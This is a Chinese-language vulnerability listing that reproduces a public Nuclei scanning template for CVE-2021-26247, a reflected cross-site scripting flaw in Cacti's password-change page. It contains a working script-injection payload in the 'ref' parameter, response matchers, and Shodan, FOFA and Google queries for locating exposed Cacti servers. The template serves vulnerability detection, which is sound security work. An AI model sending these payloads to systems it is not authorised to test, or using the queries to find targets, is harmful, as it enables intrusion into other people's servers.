CVE-2021-26247: Cacti - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Cacti | POC: 已公开

漏洞描述

Cacti contains a cross-site scripting vulnerability via "http://<CACTI_SERVER>/auth_changepassword.php?ref=<script>alert(1)</script>" which can successfully execute the JavaScript payload present in the "ref" URL parameter.

PoC代码[已公开]

id: CVE-2021-26247

info:
  name: Cacti - Cross-Site Scripting
  author: dhiyaneshDK
  severity: medium
  description: Cacti contains a cross-site scripting vulnerability via "http://<CACTI_SERVER>/auth_changepassword.php?ref=<script>alert(1)</script>" which can successfully execute the JavaScript payload present in the "ref" URL parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest security patches or upgrade to a patched version of Cacti to mitigate this vulnerability.
  reference:
    - https://www.cacti.net/info/changelog
    - https://nvd.nist.gov/vuln/detail/CVE-2021-26247
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-26247
    cwe-id: CWE-79
    epss-score: 0.31022
    epss-percentile: 0.96604
    cpe: cpe:2.3:a:cacti:cacti:0.8.7g:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: cacti
    product: cacti
    shodan-query:
      - http.title:"login to cacti"
      - http.title:"cacti"
      - http.favicon.hash:"-1797138069"
    fofa-query:
      - icon_hash="-1797138069"
      - title="cacti"
      - title="login to cacti"
    google-query:
      - intitle:"cacti"
      - intitle:"login to cacti"
  tags: cve,cve2021,cacti,xss

http:
  - method: GET
    path:
      - '{{BaseURL}}/auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"></script><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a00463044022065a738bcf9a254a10eef3eec1efa2c340cf9de695bf229684bfaad292971964e022015d479059fc8da45816df2b40a22eaeedd7f55f06f5d0d779e48c0beeffa52aa:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-26247.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2022-46169: Cacti remote_agent.php 远程命令执行漏洞 POC

CVE-2020-8813: Cacti v1.2.8 - Remote Code Execution POC

CVE-2022-46169: Cacti <=1.2.22 - Remote Command Injection POC

ShowDoc /server/index.php?s=/api/adminUpdate/download 文件上传漏洞（CVE-2021-36440） 无POC

CVE-2021-1497: Cisco HyperFlex HX Data Platform - Remote Command Execution POC

ShowDoc /server/index.php?s=/api/adminUpdate/download 文件上传漏洞（CVE-2021-36440）无POC